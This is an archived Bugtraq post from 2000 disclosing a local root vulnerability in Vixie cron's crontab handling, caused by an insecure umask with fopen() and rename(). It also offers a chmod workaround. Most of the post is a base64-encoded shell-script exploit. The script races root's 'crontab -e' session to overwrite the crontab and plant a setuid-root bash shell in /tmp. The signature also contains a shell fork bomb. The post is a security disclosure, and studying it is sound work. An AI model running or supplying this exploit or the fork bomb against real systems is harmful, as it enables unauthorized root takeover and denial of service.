[17678] in bugtraq
vixie cron...
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Fri Nov 17 01:25:41 2000
Mime-Version: 1.0
Content-Type: MULTIPART/Mixed; BOUNDARY="453665793-425463051-974433889=:7065"
Content-Id: <Pine.LNX.4.21.0011170506111.13016@nimue.tpi.pl>
Message-Id: <Pine.LNX.4.21.0011170517470.13016-200000@nimue.tpi.pl>
Date: Fri, 17 Nov 2000 05:41:32 +0100
Reply-To: Michal Zalewski <lcamtuf@TPI.PL>
From: Michal Zalewski <lcamtuf@TPI.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--453665793-425463051-974433889=:7065
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.21.0011170506112.13016@nimue.tpi.pl>
Attached shell-script exploits fopen() + preserved umask vulnerability in
Paul Vixie's cron code. It will work on systems where /var/spool/cron is
user-readable (eg. 0755) - AFAIR Debian does so. RedHat (at least 6.1 and
previous) have mode 0700 on /var/spool/cron, and thus it isn't exploitable
in its default configuration... (ahmm, but this does NOT mean it is a
problem of o+rx bits, but of insecure umask() and fopen() calls).
I have no information about other distributions or systems - this exploit
should automagically detect if you are vulnerable or not (checking
/var/spool/cron, looking for Paul Vixie's crontab, etc). Please report
your findings to me and/or to BUGTRAQ.
If any of your users launched this exploit on screen, and then any other
user (including superuser) invoked "crontab -e" to change his/her crontab
entries, privledges elevation will occour. The main attack is performed
while root (or any other user, but this particular exploit is configured
against root - feel free to change it) is editing his crontab entry. After
any modification, when crontabs are updated, this exploit will try to
insert evil code over the original contents of the crontab file
(probability of successful exploitation is near to 100%). This, after
approximately one minute, leads to account compromise.
At the beginning, this exploit is trying to abuse crontab utility in order
to create somewhat enormous number of world-writable temporary files
(these files are open with fopen(), and then rename()d to destination name
- ugh!). It might take some time and cause less or more heavy load on
ancient boxes. After finishing it, exploit is waiting, consuming little or
no system resources, till "crontab -e" session will appear. For more
details, see exploit code.
Vendors were not notified because I have no idea which systems and distros
are shipping vulnerable configuration, and because pretty good workaround
is simple: chmod 700 /var/spool/cron.
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
--453665793-425463051-974433889=:7065
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=xpl
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0011170541320.13016@nimue.tpi.pl>
Content-Description:
Content-Disposition: attachment; filename=xpl
IyEvYmluL3NoDQoNCmVjaG8gJy4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLicNCmVjaG8gJ3wgTWFyY2hldyBIeXBlcnJlYWwgSW5kdXN0cmllcyAu
Li4uLi4uLi4uLi4uLi4uLi4uIDxtYXJjaGV3QGRpb25lLmlkcy5wbD4gfCcN
CmVjaG8gInwgKCAuLi53ZWxsLCBpdCBpcyBqdXN0IG1lLCBidXQgaXQgaXMg
bW9yZSBlbGl0ZSB0byBzcGVhayBhcyBhIGdyb3VwLi4uICkgfCINCmVjaG8g
IlxgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIHByZXNlbnRz
IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSciDQplY2hvDQplY2hv
ICcgICogYW5vdGhlciB2aXhpZS1jcm9uIHJvb3Qgc3Bsb2l0IGJ5IE1pY2hh
bCBaYWxld3NraSA8bGNhbXR1ZkBpZHMucGw+ICogICAnDQplY2hvDQplY2hv
ICcuLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS4nDQplY2hvICd8IFRo
aXMgdGltZSwgaXQgaXMgc29tZXdoYXQgbW9yZSBjb21wbGljYXRlZC4gT24g
c29tZSBzeXN0ZW1zLCBpdCBtaWdodCAgIHwnDQplY2hvICd8IHJlcXVpcmUg
c29tZSB0dW5pbmcsIHRvIGJlIHNsb3dlciwgYnV0IHJlc291cmNlcy1lZmZl
Y3RpdmUuIEl0IGV4cGVjdHMgIHwnDQplY2hvICd8IHJvb3QgKG9yIG90aGVy
IGNob29zZW4gdXNlcikgdG8gZG8gImNyb250YWIgLWUiIG9yICJjcm9udGFi
IC9hbnkvZmlsZSIgIHwnDQplY2hvICd8IHNvb25lciBvciBsYXRlciwgYW5k
IHNwb29mcyB0aGUgbGVnaXRpbWF0ZSBjcm9uIGVudHJ5IGZpbGUgd2l0aCBl
dmlsICAgIHwnDQplY2hvICd8IGNvbnRlbnQsIHRodXMgbGVhZGluZyB0byBh
Y2NvdW50IGNvbXByb21pc2UgKHVzdWFsbHk6IHJvb3QgY29tcHJvbWlzZSku
IHwnDQplY2hvICJcYC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0nIg0K
ZWNobw0KDQpDWUNMRVM9MzI3NjgNCkRFU1RVU0VSPXJvb3QNClNIT1VMRFRP
T0s9NjANCg0KVkNST049ImBzdHJpbmdzIC91c3IvYmluL2Nyb250YWIgMj4v
ZGV2L251bGx8Z3JlcCAtaSB2aXhpZWAiDQoNCmlmIFsgIiRWQ1JPTiIgPSAi
IiBdOyB0aGVuDQogIGVjaG8gIlstXSBTb3JyeSwgdGhpcyBib3ggaXMgbm90
IHJ1bm5pbmcgdml4aWUgY3Jvbi4iDQogIGVjaG8NCiAgZXhpdCAxDQplbHNl
DQogIGVjaG8gIlsrXSBGb3VuZCBQYXVsIFZpeGllJ3MgL3Vzci9iaW4vY3Jv
bnRhYiB1dGlsaXR5LiINCmZpDQoNCg0KaWYgWyAtciAvdmFyL3Nwb29sL2Ny
b24gXTsgdGhlbg0KICBlY2hvICJbK10gVGhpcyBib3ggaGFzIGV4cGxvaXRh
YmxlIC92YXIvc3Bvb2wvY3Jvbi4uLiINCmVsc2UNCiAgZWNobyAiWy1dIFNv
cnJ5LCB0aGlzIGJveCBpcyBub3QgdnVsbmVyYWJsZSB0byB0aGlzIGF0dGFj
ay4iDQogIGVjaG8NCiAgZXhpdCAxDQpmaQ0KDQoNCmlmIFsgLXUgL3Vzci9i
aW4vY3JvbnRhYiBdOyB0aGVuDQogIGVjaG8gIlsrXSBUaGlzIGJveCBoYXMg
c2V0dWlkIGNyb250YWIgdXRpbGl0eS4uLiINCmVsc2UNCiAgZWNobyAiWy1d
IFNvcnJ5LCB0aGlzIGJveCBoYXMgbm8gc2V0dWlkIGNyb250YWIuIg0KICBl
Y2hvDQogIGV4aXQgMQ0KZmkNCg0KY2F0ID5kb3dyaXRlLmMgPDxfRU9GXw0K
bWFpbigpIHsNCiAgbHNlZWsoMSwwLDApOw0KICB3cml0ZSgxLCIqICogKiAq
ICogL3RtcC8ucm9vdGNyb25cblxuIiwyNik7DQogIGZ0cnVuY2F0ZSgxLDI1
KTsNCn0NCl9FT0ZfDQoNCmVjaG8gIlsrXSBDb21waWxpbmcgaGVscGVyIGFw
cGxpY2F0aW9uICMxLi4uIg0KDQpnY2MgLW8gZG93cml0ZSBkb3dyaXRlLmMg
DQoNCmlmIFsgISAtZiBkb3dyaXRlIF07IHRoZW4NCiAgZWNobyAiWy1dIENv
bXBpbGF0aW9uIGZhaWxlZC4iDQogIGVjaG8NCiAgZXhpdCAxDQpmaQ0KDQpl
Y2hvICJbK10gQXBwbGljYXRpb24gIzEgY29tcGlsZWQgc3VjY2Vzc2Z1bGx5
LiINCg0KZWNobyAiWytdIENyZWF0aW5nIGhlbHBlciBhcHBsaWNhdGlvbiAj
Mi4uLiINCg0KY2F0ID4vdG1wLy5yb290Y3JvbiA8PF9FT0ZfDQojIS9iaW4v
c2gNCg0KKA0KICBjaG93biByb290LnJvb3QgL3RtcC8ucjAwdGNyMG4NCiAg
Y2htb2QgNjc1NSAvdG1wLy5yMDB0Y3Iwbg0KICBybSAtZiAvdmFyL3Nwb29s
L2Nyb24vdG1wLioNCiAgY3JvbnRhYiAtcg0KKSAmPi9kZXYvbnVsbA0KDQpf
RU9GXw0KDQpjYXQgPnJvb3QuYyA8PF9FT0ZfDQptYWluKCkgew0KICBzZXR1
aWQoMCk7IHNldGdpZCgwKTsNCiAgdW5saW5rKCIvdG1wLy5yMDB0Y3IwbiIp
Ow0KICBleGVjbCgiL2Jpbi9iYXNoIiwiYmFzaCIsIi1pIiwwKTsNCiAgcGVy
cm9yKCJiYXNoIik7DQp9DQpfRU9GXw0KDQplY2hvICJbK10gQ29tcGlsaW5n
IGhlbHBlciBhcHBsaWNhdGlvbiAjMy4uLiINCg0KZ2NjIC1vIC90bXAvLnIw
MHRjcjBuIHJvb3QuYw0KDQppZiBbICEgLWYgL3RtcC8ucjAwdGNyMG4gXTsg
dGhlbg0KICBlY2hvICJbLV0gQ29tcGlsYXRpb24gZmFpbGVkLiINCiAgZWNo
bw0KICBleGl0IDENCmZpDQoNCmVjaG8gIlsrXSBBcHBsaWNhdGlvbiAjMyBj
b21waWxlZCBzdWNjZXNzZnVsbHkuIg0KDQoNClg9MA0KDQoNCmlmIFsgISAi
JDEiID0gIm5vcHJlcCIgXTsgdGhlbg0KDQogIGVjaG8gIlsqXSBBdHRhY2sg
YWdhaW5zdCB1c2VyICRERVNUVVNFUiwgZG9pbmcgJENZQ0xFUyBzZXR1cCBj
eWNsZXMuLi4iDQogIGVjaG8gIiAgICBQbGVhc2UgYmUgcGF0aWVudCwgc2V0
dXAgbWlnaHQgdG9vayBzb21lIHRpbWU7IHRvIHNraXAgaXQgaWYiDQogIGVj
aG8gIiAgICAvdmFyL3Nwb29sL2Nyb24gb24gdGhpcyBtYWNoaW5lIGlzIGFs
cmVhZHkgaW5pdGlhbGl6ZWQsIHVzZSINCiAgZWNobyAiICAgICckMCBub3By
ZXAnLiINCg0KICBQUk9CPSRbQ1lDTEVTKjEwMC8zMjc2OF0NCiAgdGVzdCAi
JFBST0IiIC1ndCAiMTAwIiAmJiBQUk9CPTEwMA0KDQogIGVjaG8gIlsrXSBU
aGlzIGdpdmVzIGFsbW9zdCAkUFJPQiUgcHJvYmFiaWxpdHkgb2Ygc3VjY2Vz
cyBvbiB0aGUgZmlyc3QgYXR0ZW1wdC4iDQoNCiAgd2hpbGUgWyAiJFgiIC1s
dCAiJENZQ0xFUyIgXTsgZG8NCiAgICBYPSRbWCsxXQ0KICAgIGVjaG8gLW5l
ICJccls/XSBEb2luZyBjeWNsZSAkWCBvZiAkQ1lDTEVTIFskW1gqMTAwL0NZ
Q0xFU10lIGRvbmVdLi4uICINCiAgICB1bWFzayAwDQogICAgKCAoIGNyb250
YWIgL2Rldi91cmFuZG9tICYgdXNsZWVwIDEwMDA7IGtpbGxhbGwgY3JvbnRh
YiApICYgKSAmPi9kZXYvbnVsbCANCiAgZG9uZQ0KDQogIHNsZWVwIDM7a2ls
bGFsbCAtOSBjcm9udGFiICY+L2Rldi9udWxsDQoNCiAgZWNobw0KICBlY2hv
ICJbK10gU2V0dXAgY29tcGxldGUsIC92YXIvc3Bvb2wvY3JvbiBmaWxsZWQg
d2l0aCBqdW5rIHRtcCBmaWxlcy4iDQoNCiAgQ05UPTANCg0KICBlY2hvICJb
Kl0gTm93LCBkb2luZyBjbGVhbnVwIGFuZCBjb3VudGluZyB0aGUgbm9kZXMu
Li4iDQoNCiAgZm9yIGkgaW4gMSAyIDMgNCA1IDYgNyA4IDk7IGRvDQogICAg
Zm9yIGogaW4gL3Zhci9zcG9vbC9jcm9uL3RtcC4ke2l9KjsgZG8NCiAgICAg
IGVjaG8gLW4gPiRqDQogICAgICBlY2hvIC1uZSAiXHJbK10gTm9kZSAkQ05U
IGNsZWFuLi4uICINCiAgICAgIENOVD0kW0NOVCsxXQ0KICAgIGRvbmUNCiAg
ZG9uZQ0KDQogIGVjaG8NCg0KICBQUk9CPSRbQ05UKjEwMC8zMjc2OF0NCg0K
ICBlY2hvICJbK10gRm91bmQgJENOVCBub2RlcywgYXBwcm94LiAkUFJPQiUg
Y2hhbmNlLi4uIg0KDQogIGlmIFsgIiRDTlQiIC1sdCAiJFtDWUNMRVMqMi8z
XSIgXTsgdGhlbg0KICAgIGVjaG8gIlstXSBMZXNzIHRoYW4gNjYlIG9mIGV4
cGVjdGVkIG5vZGVzIHdlcmUgY3JlYXRlZC4gVHJ5IGFkanVzdGluZyB0aGUg
ZXhwbG9pdC4iDQogICAgZWNobw0KICAgIGV4aXQgMQ0KICBmaQ0KDQplbHNl
DQoNCiAgZWNobyAiWz9dIFNraXBwaW5nIC92YXIvc3Bvb2wvY3JvbiBpbml0
aWFsaXphdGlvbi4gUmVzdWx0cyBtaWdodCBiZSB1bnByZWRpY3RhYmxlLiIN
Cg0KZmkNCg0KZWNobyAiWytdIE5vdyBJIHdpbGwgd2FpdCBmb3IgJERFU1RV
U0VSIHRvIGVkaXQgaGlzIGNyb250YWIuIENvdWxkIHRha2Ugc29tZSB0aW1l
LiINCg0KY2htb2QgNzU1IC90bXAvLnJvb3Rjcm9uDQoNCndoaWxlIDo7IGRv
DQogIHNsZWVwIDENCiAgR09UPSJgcHMgYXV4aHd8Z3JlcCBeJERFU1RVU0VS
fGdyZXAgY3JvbnRhYnxncmVwIC12IGdyZXB8Y3V0IC1iMTAtMTV8aGVhZCAt
MWAiDQogIHRlc3QgIiRHT1QiID0gIiIgJiYgY29udGludWUNCiAgR09UPWBl
Y2hvICRHT1RgDQogIGVjaG8gIlsrXSBDYXVnaHQgdmljdGltIGF0IHBpZCAk
R09ULi4uIg0KICBpZiBbICEgLWYgL3Zhci9zcG9vbC9jcm9uL3RtcC4kR09U
IF07IHRoZW4NCiAgICBlY2hvICJbLV0gREFNTiEgV2UgaGF2ZSBubyBub2Rl
IGZvciB0aGlzIHBpZCwgYmFkIGx1Y2suLi4iDQogICAgY29udGludWUNCiAg
ZmkNCiAgZWNobyAnWytdIEdvdCB0aGlzIG5vZGUgOikgRW50ZXJpbmcgZXZl
bnQgd2FpdCBsb29wLi4uJw0KICBleHBvcnQgREVTVFVTRVINCiAgKA0KICAg
ICBHPWJsYWJsYQ0KICAgICB3aGlsZSBbICEgIiRHIiA9ICIiIF07IGRvDQog
ICAgICAgRz0iYHBzIGF1eGh3fGdyZXAgXiRERVNUVVNFUnxncmVwIGNyb250
YWJ8Z3JlcCAtdiBncmVwYCINCiAgICAgZG9uZQ0KICAgICBzbGVlcCAxDQog
ICAgIGVjaG8gIlsrXSBCaW5nbyEgSXQgaGFwcGVuZWQuIE5vdyB3cml0aW5n
IG91ciBldmlsIGNvbnRlbnQuLi4iIDE+JjINCiAgICAgLi9kb3dyaXRlDQog
ICkgPi92YXIvc3Bvb2wvY3Jvbi90bXAuJEdPVA0KICBlY2hvICcqICogKiAq
ICogL2Jpbi90cnVlJyA+LmN0YWINCiAgZWNobyAiWytdIEV2aWwgY29udGVu
dCB3cml0dGVuLiBUcnlpbmcgdG8gcmVoYXNoIHRoZSBkYWVtb24uLi4iDQog
IGNyb250YWIgLmN0YWINCiAgY3JvbnRhYiAtcg0KICBlY2hvICJbK10gRW50
ZXJpbmcgZXZlbnQgbG9vcCB3YWl0aW5nIGZvciBleHBsb2l0IHRvIHdvcmsu
Li4iDQogIHdoaWxlIFsgISAtdSAvdG1wLy5yMDB0Y3IwbiBdOyBkbw0KICAg
IHNsZWVwIDENCiAgZG9uZQ0KICBybSAtZiAuY3RhYiBkb3dyaXRlIGRvd3Jp
dGUuYyAvdG1wLy5yb290Y3JvbiByb290LmMNCiAgZWNobyAiWytdIENhbGxp
bmcgdGhlIG1haW4gY29kZS4uLiINCiAgL3RtcC8ucjAwdGNyMG4NCiAgZWNo
byAiWypdIFRoYW5rIHlvdSBmb3IgY2hvb3NpbmcgTWFyY2hldyBJbmR1c3Ry
aWVzLiINCiAgZWNobw0KICBleGl0IDENCmRvbmUgIA0K
--453665793-425463051-974433889=:7065--
